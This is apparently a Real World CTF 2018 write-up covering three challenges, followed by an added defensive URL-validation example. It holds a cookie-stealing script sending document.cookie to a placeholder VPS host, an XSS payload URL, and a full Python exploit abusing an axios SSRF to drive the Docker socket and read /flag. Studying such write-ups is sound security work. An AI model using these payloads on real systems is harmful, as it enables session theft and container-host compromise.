0x01 advertisement (check-in)
Detail
This platform is under protection. DO NOT hack it.
Writeup
Attack the platform in any way that triggers a 403 and you get the flag.
(Forgot to take a screenshot; this one is borrowed.)
Flag : rwctf{SafeLine 1s watch1ng_uuu}
0x02 dot free (Web)
Detail
All the IP addresses and domain names have dots, but can you hack without dot?
http://13.57.104.34/
Writeup
Submitting url as an array triggered an error; from the debug output I guessed this was an XSS challenge,
and the error exposed part of the code.
Trying XSS directly did not work; fuzzing then produced an accident, an unintended solution.
Right-click, view source:
```javascript
function lls(src) {
  var el = document.createElement('script');
  if (el) {
    el.setAttribute('type', 'text/javascript');
    el.src = src;
    document.body.appendChild(el);
  }
};
function lce(doc, def, parent) {
  var el = null;
  if (typeof doc.createElementNS != "undefined") el = doc.createElementNS("http://www.w3.org/1999/xhtml", def[0]);
  else if (typeof doc.createElement != "undefined") el = doc.createElement(def[0]);
  if (!el) return false;
  for (var i = 1; i < def.length; i++) el.setAttribute(def[i++], def[i]);
  if (parent) parent.appendChild(el);
  return el;
};
window.addEventListener('message', function (e) {
  if (e.data.iframe) {
    // blacklist on the value: no '.', no '//', no fullwidth '。'
    if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
      if (e.data.iframe.type == "iframe") {
        lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
      } else {
        lls(e.data.iframe.value)
      }
    }
  }
}, false);
window.onload = function (ev) {
  postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')
}
```
It reads location.search, parses it as JSON and posts it as a message event, then adds an iframe based on that message.
So the following checks have to be bypassed:
e.data.iframe.value.indexOf('.') == -1
e.data.iframe.value.indexOf("//") == -1
e.data.iframe.value.indexOf("。") == -1
typeof(e.data.iframe != 'object')
That is, construct a decimal IP; the web server's default index is index.php:
```php
<?php header("Content-type: text/javascript"); ?>
var c = escape(document.cookie);
location.href = 'http://vps_ip:7799/?cookie='+c;
```
Payload : http://13.57.104.34/?%7B%22iframe%22:%7B%22value%22:%22%5C%5C%5C%5Cvps_ip_to_dec:7799%22%7D%7D
Flag : rwctf{L00kI5TheFlo9}
0x03 BookHub (web)
Quite interesting, so it gets its own post.
See BookHub Writeup - Real World CTF 2018.
0x04 PrintMD (web) (reproduced after the event)
RealWorldCTF PrintMD writeup -- CurseRed
Detail
Make HackMD printable ._. http://54.183.55.10/
Hint: If you are not skilled at black-box testing, you need to figure out how PrintMD is compatible with outdated browsers. Flag is in the filesystem /flag
Hint: Here is a render.js for you.
render.js
```javascript
const {Router} = require('express')
const {matchesUA} = require('browserslist-useragent')
const router = Router()
const axios = require('axios')
const md = require('../../plugins/md_srv')
router.post('/render', function (req, res, next) {
  let ret = {}
  ret.ssr = !matchesUA(req.body.ua, {
    browsers: ["last 1 version", "> 1%", "IE 10"],
    _allowHigherVersions: true
  });
  if (ret.ssr) {
    axios(req.body.url).then(r => {
      ret.mdbody = md.render(r.data)
      res.json(ret)
    })
  }
  else {
    ret.mdbody = md.render('# 请稍候…')
    res.json(ret)
  }
});
module.exports = router
```
Writeup
The server decides from the User-Agent whether to fetch and render the markdown document server-side.
This part was embarrassing: in the console I noticed the XHR download request ../download and looked at print.ba84889093b992d33112.js, but did not read its logic carefully. At the time the render.js hint had not been released yet, and I then forgot about the /api/render call. Hopeless.
Then, when I saw render.js, I mistook it for an RCE in the md_srv parser; too much web had gone to my head.
In print.ba84889093b992d33112.js you can find the code that sends the markdown document to the server for rendering:
```javascript
validate: function (e) {
  return e.query.url && e.query.url.startsWith("https://hackmd.io/")
},
asyncData: function (ctx) {
  if (!ctx.query.url.endsWith("/download")) {
    ctx.query.url += "/download";
  }
  ctx.query.ua = ctx.req.headers["user-agent"] || "";
  return axios.post("/api/render", qs.stringify({ ...ctx.query })).then(function (e) {
    return { ...e.data, url: ctx.query.url }
  })
},
mounted: function () {
  if (!this.ssr) {
    axios(this.url).then(function (t) {
      this.mdbody = md.render(t.data)
    })
  }
}
```
Looking back at render.js, ctx.query can be polluted through the HTTP query parameters and is then passed straight to axios(req.body.url) on the backend.
So there is an SSRF here. axios does not support the file:// scheme, but according to its documentation it does support UNIX sockets, and the example it gives is /var/run/docker.sock.
A ping succeeded and returned OK.
In other words, axios gives us unauthenticated access to Docker!!!
With the Docker Remote API we can play as we like!!!
Flag : rwctf{a journey from ssr to ssrf PogChamp}
exp.py
```python
import requests as req
import random
import string
from bs4 import BeautifulSoup
from urllib import quote as urlencode  # Python 2 import; not used below

URL = "http://54.183.55.10/print?{url}&url=https%3A%2F%2Fhackmd.io%2Fvbz2j6hkR9CIgABjEbRrzQ"
headers = {
    # old User-Agent so the server takes the ssr branch
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
}


def get(u):
    res = req.get(u, timeout=10, headers=headers)
    if res.status_code == 200:
        soup = BeautifulSoup(res.content, "lxml")
        body = soup.select(".markdown-body")
        if body:
            print(body[0].text)
            return True
    print("[-] error")


def fuck(_u):
    _u += '&url[socketPath]=/var/run/docker.sock'
    pl = URL.format(url=_u)
    try:
        get(pl)
    except:
        pass


if __name__ == '__main__':
    container_name = ''.join(random.sample(string.ascii_letters + string.digits, 6))
    _us = [
        'url[url]=/_ping&',
        'url[method]=post&url[url]=http://127.0.0.1/images/create?fromImage=alpine:latest',
        'url[method]=post&url[url]=http://127.0.0.1/containers/create?name=%s&url[data][Image]=alpine:latest&url[data][Volumes][flag][path]=/getflag&url[data][Binds][]=/flag:/getflag:ro&url[data][Entrypoint][]=/bin/ls' % container_name,
        'url[method]=post&url[url]=http://127.0.0.1/containers/%s/start' % container_name,
        'url[method]=get&url[url]=http://127.0.0.1/containers/%s/archive?path=/getflag' % container_name
    ]
    for i in _us:
        fuck(i)
```
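Added example, not part of this writeup or of PrintMD: a server-side allowlist for the render url that closes both holes seen above, the PrintMD one where a qs-decoded url[socketPath]=... arrives as an object that axios accepts as a request config, and the dot-free one where a string blacklist misses values the browser later normalizes (backslashes become //, a decimal IP such as 2130706433 becomes 127.0.0.1). The names validateRenderUrl, renderRequest, the fetcher callback and the allowlist contents are assumptions; it runs on Node with the built-in WHATWG URL class.

```javascript
// Added example, not the challenge's code: validate the /api/render "url"
// on the server instead of trusting the client's startsWith() check.
const ALLOWED_HOSTS = new Set(['hackmd.io']);   // assumed allowlist

// Returns the canonical URL string to fetch, or null if the input is rejected.
function validateRenderUrl(input) {
  // qs-style pollution (url[socketPath]=/var/run/docker.sock) decodes to an
  // object, which axios would accept as a full request config. Require a string.
  if (typeof input !== 'string') return null;

  let parsed;
  try {
    parsed = new URL(input);            // WHATWG parser: throws on "\\host:7799",
  } catch (err) {                       // relative paths and bare socket paths
    return null;
  }

  // The parser has already canonicalized backslashes and decimal IPs
  // (2130706433 -> 127.0.0.1), so comparing the parsed hostname is meaningful.
  if (parsed.protocol !== 'https:') return null;
  if (!ALLOWED_HOSTS.has(parsed.hostname)) return null;
  if (parsed.username || parsed.password) return null;

  // Keep the client's contract of always fetching the /download form.
  if (!parsed.pathname.endsWith('/download')) parsed.pathname += '/download';
  return parsed.toString();
}

// Shape of the hardened handler: fetcher(url) stands in for axios(url).
function renderRequest(body, fetcher) {
  const url = validateRenderUrl(body.url);
  if (url === null) return { status: 400, error: 'invalid url' };
  return { status: 200, url: url, mdbody: fetcher(url) };
}
```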